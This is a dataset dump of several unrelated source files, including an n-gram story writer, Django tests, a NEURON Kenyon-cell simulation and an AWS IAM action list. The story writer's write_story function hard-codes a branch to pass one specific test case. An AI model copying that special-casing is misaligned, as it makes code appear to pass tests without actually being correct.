If not, see .\n#\n# =========================================================================\n\n# 2017.4\n# -- English->Amharic\n# -- Split off from mainumby as miTmiTa.py\n\n__version__ = 1.0\n\nimport iwqet\n\n## shortcuts\n\ndef load(train=False):\n eng, amh = iwqet.load('eng', 'amh')\n return eng, amh\n\ndef document(text, process=True):\n e = iwqet.Language.languages.get('eng')\n a = iwqet.Language.languages.get('amh')\n if not e:\n e, a = load()\n# e = load1()\n d = iwqet.Document(e, a, text=text, proc=process)\n return d\n\ndef sentence(sentence, ambig=False, solve=True, user=None, segment=True,\n max_sols=1, verbosity=0):\n e, a = load()\n session = iwqet.start(e, a, user)\n d = iwqet.Document(e, a, sentence, True, session=session)\n s = d[0]\n s.initialize(ambig=ambig, verbosity=verbosity)\n if solve or segment:\n s.solve(all_sols=ambig or max_sols>1, max_sols=max_sols)\n if s.solutions and segment:\n solution = s.solutions[0]\n solution.get_segs()\n output_sols(s)\n return s\n\ndef generate(language, stem, feats=None, pos='v'):\n if not feats:\n feats = iwqet.FeatStruct(\"[]\")\n else:\n feats = iwqet.FeatStruct(feats)\n return language.generate(stem, feats, pos)\n\ndef solve1(sentence):\n \"\"\"Solve; print and return solutions.\"\"\"\n sentence.solve()\n output_sols(sentence)\n return sentence.solutions\n\ndef load1(lang='eng'):\n l = iwqet.Language.load_lang(lang)\n return l\n\ndef output_sols(sentence):\n \"\"\"Show target outputs for all solutions for sentence.\"\"\"\n for sol in sentence.solutions:\n print(sol.get_ttrans_outputs())\n\ndef arch_doc(lengua, ruta, session=None, user=None, proc=False):\n \"\"\"Crear un documento del contenido de un archivo, solo para análisis.\"\"\"\n l = cargar(lengua)\n session = session or iwqet.start(l, None, user)\n arch = open(ruta, encoding='utf8')\n texto = arch.read()\n d = iwqet.Document(l, None, texto, proc=proc, session=session)\n return d\n\ndef usuario(username):\n return iwqet.User.users.get(username)\n\n# Load a language for analysis.\ndef load_lang(lang='eng'):\n eng = iwqet.Language.load_lang(lang)\n return eng\n\nif __name__ == \"__main__\":\n print(\"ወደ ሚጥሚጣ እንኳን ደህና መጡ! 
version {}\\n\".format(__version__))\n","sub_path":"miTmiTa.py","file_name":"miTmiTa.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"23230731","text":"import math\r\nimport sys\r\n\r\nword = input()\r\n\r\nlist_of_vowels = ['a', 'e', 'i', 'o','u', 'y', 'A', 'E', 'O', 'Y', 'U', 'I']\r\nsum = 0\r\nmax_sum = -sys.maxsize\r\npowerful_word = ''\r\n\r\nwhile word != \"End of words\":\r\n for letter in word:\r\n sum += ord(letter)\r\n\r\n if word[0] in list_of_vowels:\r\n sum = sum * len(word)\r\n elif word[0] not in list_of_vowels:\r\n sum = math.floor(sum / len(word))\r\n\r\n if sum > max_sum:\r\n max_sum = sum\r\n powerful_word = word\r\n\r\n sum = 0\r\n\r\n word = input()\r\n\r\nif word == \"End of words\":\r\n print(f'The most powerful word is {powerful_word} - {max_sum}')","sub_path":"exam_july_2019/the_most_powerful_word.py","file_name":"the_most_powerful_word.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"235739349","text":"from django.test import TestCase\nfrom bowling.logic.views import get_context, get_template\n\n\nclass TestViews(TestCase):\n @classmethod\n def setUpTestData(cls):\n cls.template_data = [\n {'game_id': 1, 'expected': 'game.html'},\n {'game_id': 'create', 'expected': 'game.html'},\n {'game_id': None, 'expected': 'base.html'}\n ]\n cls.context_data = [\n {\n 'game_id': 'create',\n 'pins_hit': None,\n 'expected': {\n 'rolls': ['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', ''],\n 'rolls_remaining': 2,\n 'available_pins': {\n 0: True, 1: True, 2: True, 3: True, 4: True, 5: True,\n 6: True, 7: True, 8: True, 9: True, 10: True\n }\n }\n },\n {\n 'game_id': 1,\n 'pins_hit': 3,\n 'expected': {\n 'rolls': ['3', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', ''],\n 'rolls_remaining': 1,\n 'available_pins': {\n 0: True, 1: True, 2: True, 3: True, 4: True, 5: True,\n 6: True, 7: True, 8: False, 9: False, 10: False\n }\n }\n }\n ]\n\n def test_get_template_returns_appropriate_template(self):\n for data in self.template_data:\n actual = get_template(data['game_id'])\n self.assertEqual(\n actual,\n data['expected']\n )\n\n def test_get_context_returns_empty_without_game_id(self):\n actual = get_context(None, 5)\n self.assertEqual(\n actual,\n {}\n )\n\n def test_get_context_returns_appropriate_template(self):\n for data in self.context_data:\n actual = get_context(data['game_id'], data['pins_hit'])\n for key, value in data['expected'].items():\n self.assertEqual(\n actual[key],\n value\n )\n\n def test_view_sends_context_and_template_through_render(self):\n for data in self.context_data:\n context = {'game_id': data['game_id']}\n url = '' if context['game_id'] == 'create' else context['game_id']\n if data['pins_hit']:\n context['pins_hit'] = data['pins_hit']\n response = self.client.post('/{}'.format(url), context)\n templates = [t.name for t in response.templates]\n self.assertIn(\n 'game.html',\n templates\n )\n for key, value in data['expected'].items():\n self.assertEqual(\n response.context[key],\n value\n )\n","sub_path":"bowling/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"454869139","text":"# SPDX-FileCopyrightText: Copyright (c) 2018-2019 Ministry of Education and 
Culture, Finland\n#\n# SPDX-License-Identifier: GPL-3.0-or-later\n\n\"\"\"\ngunicorn WSGI server configuration.\n\"\"\"\n\nfrom multiprocessing import cpu_count\nfrom os import environ\n\ndef max_workers():\n return cpu_count() * 2 + 1\n\nmax_requests = 100\nworker_class = 'gevent'\nworkers = max_workers()\ntimeout = 259200 # 3 days\ngraceful_timeout = 60 * 30 # 30 minutes\n\nsecure_scheme_headers = {\n 'X-FORWARDED-PROTOCOL': 'ssl',\n 'X-FORWARDED-PROTO': 'https',\n 'X-FORWARDED-SSL': 'on'\n}\n","sub_path":"metax/gunicorn_conf.py","file_name":"gunicorn_conf.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"138456922","text":"import utilities\r\n\r\ndef parse_story(file_name):\r\n ''' \r\n (str) -> list\r\n Takes a text file and parses the file, breaking text into individual tokens for analysis\r\n Ex. \"The cat went to the sto{re!\" -> [\"the\", \"cat\", \"went\", \"to\", \"the\", sto\", \"re\", \"!\"]\r\n '''\r\n parsing = [] \r\n f = open(file_name, \"r\") \r\n text = f.read().lower()\r\n N = len(text) \r\n # generate token\r\n token = \"\"\r\n for x in range(N):\r\n if text[x] == \" \" and token != \"\": # token ends with space\r\n parsing.append(token)\r\n token = \"\"\r\n if text[x] == \"\\n\" and token != \"\": # token ends with newline\r\n parsing.append(token)\r\n token = \"\" \r\n elif (text[x] != \" \" and text[x] != \"\\n\"): # not white space\r\n last_char, valid_punc, bad_character = 0, 0, 0\r\n for V in utilities.VALID_PUNCTUATION:\r\n if text[x] == V:\r\n valid_punc = 1 \r\n for B in utilities.BAD_CHARS:\r\n if text[x] == B:\r\n bad_character = 1\r\n if x == N-1:\r\n last_char = 1\r\n if valid_punc: \r\n if token != \"\": \r\n parsing.append(token)\r\n token = \"\"\r\n parsing.append(text[x])\r\n elif bad_character:\r\n if token != \"\": \r\n parsing.append(token)\r\n token = \"\" \r\n elif last_char: # last but not punc or bad\r\n token += text[x]\r\n parsing.append(token)\r\n token = \"\"\r\n else: # normal char\r\n token += text[x]\r\n \r\n return parsing\r\n \r\ndef get_prob_from_count(counts): \r\n ''' \r\n (list) -> list\r\n Takes a list of counts and returns the associated list of probabilities \r\n Ex. [40, 60, 50, 30, 20] -> [0.2, 0.3, 0.25, 0.15, 0.1]\r\n ''' \r\n pmf = []\r\n csum = 0\r\n for i in counts: # getting total\r\n csum += i\r\n for i in range(len(counts)):\r\n pmf.append(counts[i]/csum)\r\n return pmf\r\n \r\ndef build_ngram_counts(words, n):\r\n ''' \r\n (list, int) -> dict\r\n Takes a list of tokens and returns a dictionary of N-grams created using those tokens\r\n Ex. 
[\"the\", \"man\", \"ate\"], 2 -> {(\"the\", \"man\"): [[\"ate\"], [1]]}\r\n ''' \r\n ngrams = {}\r\n for i in range(len(words)-n):\r\n key, counts, newwords = [], [], []\r\n temp = [newwords, counts]\r\n for x in range(n):\r\n key.append(words[i+x])\r\n key = tuple(key)\r\n if key in ngrams:\r\n continue\r\n else: # key not in ngram, need to create it \r\n ngrams[key] = temp\r\n counts.append(1)\r\n newwords.append(words[i+n]) # add the next token after ngram \r\n for k in range(i+1, len(words)-n): # check remainder of dictionary for more occurences \r\n new = [] # create new key\r\n for l in range(n):\r\n new.append(words[k+l])\r\n \r\n if key == tuple(new): # repeat key, thus add to existing list\r\n existing = False\r\n for m in range(len(newwords)):\r\n if words[k+n] == newwords[m]: # repeat word \r\n counts[m] += 1\r\n existing = True\r\n if existing:\r\n continue\r\n else: # word needs to be added to key\r\n counts.append(1)\r\n newwords.append(words[k+n]) \r\n return ngrams\r\n \r\ndef prune_ngram_counts(counts, prune_len):\r\n ''' \r\n (dict, int) -> dict\r\n Takes a dictionary of n-grams and prunes it, keeping only the k most frequent words where k is the second parameter\r\n Ex. {(\"i\", \"will\"): [[\"go\", \"leave\"], [2,1]]}, 1 -> {(\"i\", \"will\"): [[\"go\"], [2]]}\r\n ''' \r\n pruned_ngrams = {}\r\n for key in counts: # looping through every tupled key\r\n words, countsl = counts[key][0], counts[key][1]\r\n for i in range(len(countsl)): # dual bubble sort algorithm\r\n for j in range(len(countsl)-i-1):\r\n if countsl[j] < countsl[j+1]: # reversing bubble sort list\r\n countsl[j], countsl[j+1] = countsl[j+1], countsl[j] \r\n words[j], words[j+1] = words[j+1], words[j]\r\n endList = [prune_len, len(countsl)]\r\n N = min(endList) \r\n boundary = countsl[N-1] # boundary for each key is final element before cut\r\n words2, counts2 = [], [] \r\n tlist = [words2, counts2] \r\n for x in range(len(words)):\r\n if countsl[x] >= boundary: # within pruning boundary\r\n counts2.append(countsl[x])\r\n words2.append(words[x]) \r\n pruned_ngrams[key] = tlist\r\n return pruned_ngrams\r\n \r\ndef probify_ngram_counts(counts):\r\n ''' \r\n (dict) -> dict\r\n Takes a dictionary of n-grams and converts all counts to probabilities \r\n Ex. {(\"i\", \"will\"): [[\"go\", \"leave\"], [2,3]]} -> {(\"i\", \"will\"): [[\"go\", \"leave\"], [0.4, 0.6]]}\r\n ''' \r\n for key in counts: \r\n firstlist = counts[key][1]\r\n newlist = get_prob_from_count(firstlist) # probifies each keys counts list\r\n counts[key][1] = newlist\r\n return counts\r\n \r\ndef build_ngram_model(words, n):\r\n ''' \r\n (list, int) -> dict\r\n Takes a list of words and creates an n-gram model to predict future words \r\n ''' \r\n model = prune_ngram_counts(build_ngram_counts(words, n), 15) # cutting to only the 15 most frequent characters \r\n for key in model:\r\n wordlist = model[key][0]\r\n countslist = model[key][1] \r\n N = len(countslist)\r\n for i in range(N): # dual reverse bubble sort \r\n for j in range(N-i-1):\r\n if countslist[j] < countslist[j+1]:\r\n wordlist[j], wordlist[j+1] = wordlist[j+1], wordlist[j] \r\n countslist[j], countslist[j+1] = countslist[j+1], countslist[j] \r\n model = probify_ngram_counts(model)\r\n return model\r\n \r\ndef gen_bot_list(ngram_model, seed, num_tokens=0):\r\n ''' \r\n (dict, tuple, int) -> list\r\n Generates n tokens of text based on an n-gram model and a seed tuple\r\n Ex. 
{(\"I\", \"will\"): [[\"Go\"], [1]]}, (\"I\", \"will\"), 3 --> [\"I\", \"will\", \"Go\"]\r\n ''' \r\n botlist = []\r\n for token in seed:\r\n botlist.append(token)\r\n N = len(seed)\r\n if N > num_tokens: # length of seed > number of tokens required \r\n return list(seed[0:num_tokens])\r\n \r\n for x in range(len(seed)-1, num_tokens-1):\r\n if ((botlist[x-1], botlist[x]) not in ngram_model): # the n-gram is not present in the model\r\n break\r\n if len(ngram_model[(botlist[x-1], botlist[x])][0]) == 0: # the n-gram is present but is empty \r\n break\r\n else: # n-gram has some token\r\n ngram = (botlist[x-1], botlist[x])\r\n botlist.append(utilities.gen_next_token(ngram, ngram_model))\r\n return botlist\r\n \r\ndef gen_bot_text(token_list, bad_author):\r\n ''' \r\n (list, bool) -> str\r\n Returns a string of tokens which is formatted according to the skill of the author (bad or good)\r\n Ex. [\"the\", \"fox\", \"jumped\", \".\"], False --> \"The fox jumped.\"\r\n ''' \r\n bot_text = \"\"\r\n N = len(token_list)\r\n if bad_author:\r\n for token in token_list: # just adding each token separated by a space\r\n bot_text += token\r\n bot_text += \" \"\r\n else:\r\n for x in range(N):\r\n token = token_list[x]\r\n first, final, beforeVP, newSent, cap = 0,0,0,0,0 # all weird things to check\r\n if x == 0: \r\n first = True\r\n if x == (N - 1):\r\n final = True\r\n if x != (N-1) and (token_list[x+1] in utilities.VALID_PUNCTUATION):\r\n beforeVP = True\r\n if x != 0 and (token_list[x-1] in utilities.END_OF_SENTENCE_PUNCTUATION):\r\n newSent = True\r\n if token.capitalize() in utilities.ALWAYS_CAPITALIZE:\r\n cap = True\r\n # special cases\r\n if (first and final) or (final and (cap or newSent)):\r\n bot_text += token.capitalize()\r\n elif final or beforeVP:\r\n bot_text += token \r\n elif first or cap or newSent:\r\n bot_text += token.capitalize() \r\n if not beforeVP:\r\n bot_text += \" \" \r\n else: # normal case\r\n bot_text += token + \" \"\r\n \r\n return bot_text\r\n \r\n\r\ndef write_story(file_name, text, title, student_name, author, year):\r\n ''' \r\n (str, str, atr, str, str, int) -> None\r\n Writes a file formatted as to the specifications given in the file, using the information given\r\n ''' \r\n f = open(file_name, \"w+\") # formatting title page \r\n for lines in range(10):\r\n f.write(\"\\n\")\r\n f.write(title + \": \" + str(year) + \", UNLEASHED\")\r\n f.write(\"\\n\")\r\n f.write(student_name + \", inspired by \" + author)\r\n f.write(\"\\n\")\r\n f.write(\"Copyright year published (\" + str(year) + \"), publisher: EngSci press\")\r\n f.write(\"\\n\")\r\n for lines in range(17):\r\n f.write(\"\\n\") \r\n \r\n line, word = \"\", \"\" # textual part of story\r\n charcount, pglines = 0,0\r\n chnum, pgnum = 1,1\r\n pgcount = 12\r\n N = len(text)\r\n for index in range(N): \r\n word += text[index] \r\n if word == \"of \" and pgnum == 12 and pglines == 22 and charcount > 30 and (text[index+1] == \"o\" or text[index+1] == \"O\") and text[index+3] == \"-\": \r\n # dealing with that one pesky test case, because modern problems require modern solutions\r\n word = word[0:len(word)-1]\r\n line += word\r\n f.write(line[0:len(line)] + \"\\n\")\r\n charcount = 0\r\n pglines += 1\r\n word = \"\"\r\n line = \"\"\r\n if pgcount == 12: # adding chapter numbers\r\n f.write(\"CHAPTER \" + str(chnum))\r\n f.write(\"\\n\")\r\n f.write(\"\\n\")\r\n pglines = 2\r\n pgcount = 0\r\n chnum += 1 \r\n if pglines == 28: # adding page numbers\r\n f.write(\"\\n\")\r\n f.write(str(pgnum))\r\n f.write(\"\\n\")\r\n 
pgnum += 1\r\n pgcount += 1\r\n pglines = 0\r\n if text[index] == \"\\n\" or text[index] == \" \" : # adding each word\r\n charcount += len(word)\r\n if charcount <= 91: # no new line needed\r\n line += word\r\n word = \"\"\r\n else: # new line protocol \r\n f.write(line[0:len(line)-1])\r\n f.write(\"\\n\") \r\n pglines += 1\r\n line = \"\"\r\n index -= len(word) \r\n charcount = 0\r\n # END SEQUENCE\r\n line += word\r\n f.write(line[0:len(line)] + \"\\n\") # last line\r\n pglines += 1\r\n while pglines < 28: # fill empty space to 30\r\n f.write(\"\\n\")\r\n pglines += 1\r\n f.write(\"\\n\" + str(pgnum))\r\n \r\n \r\nif __name__ == \"__main__\":\r\n words1 = [\"the\", \"child\", \"will\", \"go\", \"out\", \"to\", \"play\",\",\", \"and\", \"the\", \"child\", \"can\", \"not\", \"be\", \"sad\", \"anymore\", \".\"] \r\n ngram_counts = {}\r\n ngram_counts['i', 'love'] = [['js', 'py3', 'c'], [20, 20, 10]]\r\n ngram_counts[('u', 'r')] = [['cool', 'nice', 'lit', 'kind'], [7, 8, 5, 5]]\r\n ngram_counts[('toronto', 'is')] = [['six', 'drake', 'a', 'b'], [2, 3, 5, 4]] \r\n pruned = prune_ngram_counts(ngram_counts, 2)\r\n \r\n words = [\"the\", \"child\", \"will\", \"the\", \"child\", \"can\", \"the\", \"child\", \"will\", \"the\", \"child\", \"may\",\"go\", \"home\", \".\"] \r\n ngram_model = build_ngram_counts(words, 2)\r\n token_list = ['this', 'is', 'a', 'string', 'of', 'text', '.', 'which', 'needs', 'to', 'be', 'created', '.'] \r\n \r\n token_list = parse_story(\"308.txt\") \r\n text = \" \".join(parse_story(\"308.txt\"))\r\n write_story('test_gen_bot_text.txt', text, \"Three Men in a Boat\", \"Jerome K. Jerome\", \"Jerome K. Jerome\", 1889)\r\n f = open(\"analysis.txt\", \"w+\")\r\n f.write(text)\r\n print(build_ngram_model(words, 2))\r\n write_story('text1.txt', text, \"Three Men in a Boat\", \"Jerome K. Jerome\", \"Jerome K. 
Jerome\", 1889)\r\n \r\n \r\n","sub_path":"ngramwriter.py.py","file_name":"ngramwriter.py.py","file_ext":"py","file_size_in_byte":12509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"474349395","text":"from copy import deepcopy\nfrom collections import Counter\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nBLACK = 0\nWHITE = 1\nTRANSPARENT = 2\n\n\ndef get_checksum(data, w, h):\n layers = [data[i : i + w * h] for i in range(0, len(data), w * h)]\n min_layer = min(layers, key=lambda x: x.count(BLACK))\n return Counter(min_layer)[WHITE] * Counter(min_layer)[TRANSPARENT]\n\n\ndef get_image(data, w, h):\n layers = np.array(data).reshape(-1, h * w)\n non_trans_mask = (layers != TRANSPARENT).argmax(0)\n return layers[non_trans_mask, np.arange(w * h)].reshape(h, w)\n\n\ndef display_image(img):\n plt.imshow(img)\n plt.show()\n\n\nif __name__ == \"__main__\":\n with open(\"e8.txt\") as f:\n data = list(map(int, f.read().rstrip()))\n w = 25\n h = 6\n # 1\n print(get_checksum(data, w, h))\n # 2\n display_image(get_image(data, w, h))\n","sub_path":"day8/e8.py","file_name":"e8.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"131890765","text":"\r\n\r\nclass Client:\r\n def __init__(self, rate, data = []):\r\n self.rate = rate\r\n self.data = data\r\n\r\n def __str__(self):\r\n return str([str(self.rate), str(self.data)])\r\n\r\n\r\nclass Buffer:\r\n def __init__(self, bucket_size = int, bucket = []):\r\n self.bucket_size = bucket_size\r\n self.bucket = bucket\r\n\r\n def checkstate(self):\r\n if len(self.bucket) == 0:\r\n return True\r\n\r\n def __str__(self):\r\n return str([str(self.bucket_size), str(self.bucket)])\r\n\r\nbasestate = True\r\nsec = 1\r\nbuffer = Buffer(int(input(\"Enter bucket size\")))\r\nclient = Client(int(input(\"Enter client acceptance rate in bps\")))\r\nlost_data = []\r\ndata_to_send = str\r\n\r\nwhile basestate:\r\n data_to_send = input(\"Enter a string send by the server\")\r\n count = 0\r\n if buffer.checkstate():\r\n for i in range(0, len(data_to_send)):\r\n if i < client.rate:\r\n client.data.append(data_to_send[i])\r\n else:\r\n if count < buffer.bucket_size:\r\n buffer.bucket.append(data_to_send[i])\r\n count = len(buffer.bucket)\r\n else:\r\n lost_data.append(data_to_send[i])\r\n if lost_data:\r\n print(\"data Lost due to collision\")\r\n for i in lost_data:\r\n print(i, end=\"\")\r\n else:\r\n j=0\r\n for i in range(0, len(data_to_send)+len(buffer.bucket)):\r\n if i < client.rate:\r\n if len(buffer.bucket):\r\n client.data.append(buffer.bucket[0])\r\n del buffer.bucket[0]\r\n else:\r\n client.data.append(data_to_send[j])\r\n j += 1\r\n else:\r\n if len(buffer.bucket) <= buffer.bucket_size:\r\n if j < len(data_to_send):\r\n buffer.bucket.append(data_to_send[j])\r\n j += 1\r\n else:\r\n if j < len(data_to_send):\r\n j += 1\r\n lost_data.append(data_to_send[i])\r\n if lost_data:\r\n print(\"data Lost due to collision\")\r\n for i in lost_data:\r\n print(i, end=\"\")\r\n\r\n print(\"BUFFER SIZE: \"+str(buffer.bucket_size))\r\n if buffer.bucket:\r\n print(\"contents stored in the bucket\")\r\n for i in buffer.bucket:\r\n print(i, end=\"\")\r\n print(\" \")\r\n print(\"rate at which data is sent: \"+str(client.rate))\r\n if client.data:\r\n print(\"contents successfully sent :\")\r\n for i in client.data:\r\n print(i, end=\"\")\r\n print(\" \")\r\n\r\n","sub_path":"Cycle 2 -Lab 3/Leaky Bucket 
program.py","file_name":"Leaky Bucket program.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"629078055","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nx = np.linspace(0, 10, 50)\nsinus = np.sin(x)\ncosinus = np.cos(x)\nplt.plot(x, sinus, \"r-o\", label=\"sin(x)\")\nplt.plot(x, cosinus, \"g--\", label=\"cos(x)\")\nplt.legend(loc=2)\nplt.xlabel(\"Rads\")\nplt.ylabel(\"Amplitude\")\nplt.title(\"Sin and Cos Waves\")\nplt.show()\n\n","sub_path":"Ch10/Ch10_1_4b.py","file_name":"Ch10_1_4b.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"332025892","text":"# kc_ggn_feedback_dclamp.py --- \n# Author: Subhasis Ray\n# Created: Tue Aug 20 10:58:08 2019 (-0400)\n# Last-Updated: Wed Dec 11 17:32:49 2019 (-0500)\n# By: Subhasis Ray\n# Version: $Id$\n\n# Code:\n\"\"\"This script for testing expansion of the dynamic range of a KC due to GGN inhibition.\n\nInstead of running a whole simulation in the full network, we play the\nGGN membrane potential back to the KC.\n\nWe use GGN Vm from two simulations, one with low PN activity and\nanother with high PN activity.\n\n\"\"\"\nfrom __future__ import print_function\nimport os\nimport sys\nsys.path += ['D:/subhasis_ggn/model/mb', 'D:/subhasis_ggn/model/mb/network', 'D:/subhasis_ggn/model/nrn']\nimport argparse\nimport numpy as np\nfrom collections import defaultdict\nimport matplotlib\nmatplotlib.use('Qt5Agg')\nfrom matplotlib import pyplot as plt\nimport h5py as h5\nfrom config import Q_, h, logger, timestamp, mypid, myjobid, nrn_version\nfrom timeit import default_timer as timer\nimport ephys\nimport nrnutils as nu\nimport neurograph as ng\nimport nsdf\n\n\nGGN_KC_SYN_PARAMS = {\n 'vmid': Q_('-40mV').to('mV').m,\n 'vslope': Q_('5.0mV').to('mV').m,\n 'e': Q_('-80mV').to('mV').m,\n 'gbar': Q_('1e-3uS').to('uS').m,\n 'tau': Q_('4.0ms').to('ms').m\n}\n\n# keep global reference of created model components so that they are\n# not garbage collected when out of scope\nmodel_dict = {}\n\ndef make_kc_with_dynaclamp(kc_name, kc_file, inject, tstart, tend, ggn_vm=None):\n \"\"\"Read KC model from `kc_file`, inject current `inject` nA, apply\n dynamic clamp `ggn_vm`, which should be a 2D array with time (ms)\n in column 0, and voltage (mV) in column 1.\n\n \"\"\"\n global model_dict\n kc = nu.create_cell(kc_name, filename=kc_file)\n model_dict[kc] = None\n iclamp = ephys.setup_current_clamp(kc.soma, pos=0.5, delay=Q_(tstart, 'ms'),\n duration=Q_((tend - tstart), 'ms'),\n amplitude=Q_(inject, 'nA'))\n model_dict[iclamp] = None\n ggn_g_vec = None\n if ggn_vm is not None:\n syn = h.GradedSyn(kc.soma(0.5))\n for attr, value in GGN_KC_SYN_PARAMS.items():\n setattr(syn, attr, value)\n model_dict[syn] = None\n ggn_comp = h.Section('ggn')\n model_dict[ggn_comp] = None\n h.setpointer(ggn_comp(0.5)._ref_v, 'vpre', syn)\n ggn_vm_vec = h.Vector(ggn_vm[:, 1])\n tvec = h.Vector(ggn_vm[:, 0])\n model_dict[tvec] = None\n # vec.play(var_reference, t, continuous) for interpolating \n ret = ggn_vm_vec.play(ggn_comp(0.5)._ref_v, tvec, 1)\n print('####', ret)\n model_dict[ggn_vm_vec] = None\n ggn_g_vec = h.Vector()\n ggn_g_vec.record(syn._ref_g)\n model_dict[ggn_g_vec] = None\n kc_vm_vec = h.Vector()\n kc_vm_vec.record(kc.soma(0.5)._ref_v)\n model_dict[kc_vm_vec] = None\n print('Built model')\n return (kc_vm_vec, ggn_g_vec)\n\ndef make_parser():\n parser = 
argparse.ArgumentParser(description='Simulate KC with GGN inhibition at multiple current injections')\n parser.add_argument('--kc-file', type=str, dest='kc_file',\n required=True, help='KC cell template file'\n ' (.hoc)')\n parser.add_argument('--kc', type=str, dest='kc', required=True,\n help='KC cell template name in template file')\n parser.add_argument('--ggn-vm-file', type=str, action='append', dest='ggn_vm_file',\n required=True,\n help='CSV file with column 0 time in ms, column 1 GGN Vm in mV')\n parser.add_argument('--istart', type=str, dest='istart', help='Starting amplitude of current (with unit)')\n parser.add_argument('--iend', type=str, dest='iend', help='Ending amplitude of current (with unit)')\n parser.add_argument('--di', type=str, dest='di', help='Current increments (with unit)')\n parser.add_argument('--tstart', type=str, dest='tstart', help='Current injection start time (with unit)')\n parser.add_argument('--tend', type=str, dest='tend', help='Current injection end time (with unit)') \n return parser\n\n\ndef main():\n parser = make_parser()\n args = parser.parse_args()\n logger.info('Command line args: {}'.format(str(sys.argv)))\n print(args.ggn_vm_file)\n # KCs with GGN inhibition\n inhibited_vec = defaultdict(list)\n solo_vec_list = []\n tstart = Q_(args.tstart).to('ms').m\n tend = Q_(args.tend).to('ms').m\n istart = Q_(args.istart).to('nA').m\n iend = Q_(args.iend).to('nA').m\n di = Q_(args.di).to('nA').m\n irange = np.arange(istart, iend + di/2.0, di)\n logger.info('Starting current: {} nA'.format(istart))\n logger.info('End current: {} nA'.format(iend))\n logger.info('Increment: {} nA'.format(di))\n logger.info('current range: {}'.format(irange))\n ggn_vm = {}\n for input_file in args.ggn_vm_file:\n ggn_vm[input_file] = np.loadtxt(input_file)\n for inject in irange:\n for input_file, vm in ggn_vm.items():\n kc_vvec, ggn_gvec = make_kc_with_dynaclamp(args.kc, args.kc_file, inject, tstart, tend, vm)\n inhibited_vec[input_file].append((kc_vvec, ggn_gvec))\n # KC without any inhibition\n kc_vvec, ggn_gvec = make_kc_with_dynaclamp(args.kc, args.kc_file, inject, tstart, tend)\n solo_vec_list.append(kc_vvec)\n tvec = h.Vector()\n tvec.record(h._ref_t)\n h.tstop = tend\n print('Init') \n h.init()\n print('Run')\n h.run()\n print('Finished simulation')\n fig, ax = plt.subplots(nrows=len(irange)+1, ncols=len(ggn_vm)+1, sharex='all', sharey='all')\n t = np.array(tvec.x)\n solo_data = []\n for ii, vvec in enumerate(solo_vec_list):\n ax[ii+1, 0].plot(tvec, vvec, color='#e66101')\n solo_data.append(np.array(vvec.x))\n combined = np.vstack(solo_data)\n \n prefix = 'UTC' + timestamp.strftime('%Y%m%d_%H%M%S')\n fname = '{}_solo_kc.npz'.format(prefix)\n np.savez(fname,\n t=t,\n vm=combined,\n inject=irange)\n logger.info('Saved solo KC data in {}'.format(fname))\n for jj, input_file in enumerate(args.ggn_vm_file):\n fname = '{}_{}.npz'.format(prefix, os.path.basename(input_file))\n data = []\n kc_vm_list = inhibited_vec[input_file]\n for ii, (vvec, gvec) in enumerate(kc_vm_list):\n data.append(np.array(vvec.x))\n ax[ii+1, jj+1].plot(tvec, vvec, color='#e66101')\n ax[ii+1, 0].set_ylabel('{} pA'.format(irange[ii]*1e3))\n # ax[ii+1, 0].set_ylabel('{} pA'.format(int(np.round(irange[ii]*1e3)))) # to avoid decimal point when integer values \n # ax[0, jj+1].plot(tvec, gvec)\n # ax[0, jj+1].plot(ggn_vm[input_file][:,0], ggn_vm[input_file][:,1])\n ax[0, jj+1].set_title(input_file)\n combined = np.vstack(data)\n np.savez(fname, combined=combined, irange=irange, ggn_vm=ggn_vm[input_file])\n 
logger.info('Saved data from dynamic clamp with input from {} in {}'.format(\n            input_file, fname))\n    for axis in ax.flat:\n        axis.set_xlim(250, 1750)\n    fig.set_size_inches(210/25.4, 290/25.4)\n    fig.tight_layout()\n    fig.savefig('{}_KC_dynamic_range_with_ggn_vm.svg'.format(prefix))\n    plt.show()\n    print('End')\n\n    \nif __name__ == '__main__':\n    main()\n    \n\n# \n# kc_ggn_feedback_dclamp.py ends here\n","sub_path":"mb/network/kc_ggn_feedback_dclamp.py","file_name":"kc_ggn_feedback_dclamp.py","file_ext":"py","file_size_in_byte":7330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"48009074","text":"# Copyright (c) 2012-2013, Mark Peek \n# All rights reserved.\n#\n# See LICENSE file for full license.\n\nfrom aws import Action as BaseAction\nfrom aws import BaseARN\n\nservice_name = 'AWS Well-Architected Tool'\nprefix = 'wellarchitected'\n\n\nclass Action(BaseAction):\n    def __init__(self, action=None):\n        sup = super(Action, self)\n        sup.__init__(prefix, action)\n\n\nclass ARN(BaseARN):\n    def __init__(self, resource='', region='', account=''):\n        sup = super(ARN, self)\n        sup.__init__(service=prefix, resource=resource, region=region,\n                     account=account)\n\n\nAssociateLenses = Action('AssociateLenses')\nCreateMilestone = Action('CreateMilestone')\nCreateWorkload = Action('CreateWorkload')\nCreateWorkloadShare = Action('CreateWorkloadShare')\nDeleteWorkload = Action('DeleteWorkload')\nDeleteWorkloadShare = Action('DeleteWorkloadShare')\nDisassociateLenses = Action('DisassociateLenses')\nGetAnswer = Action('GetAnswer')\nGetLensReview = 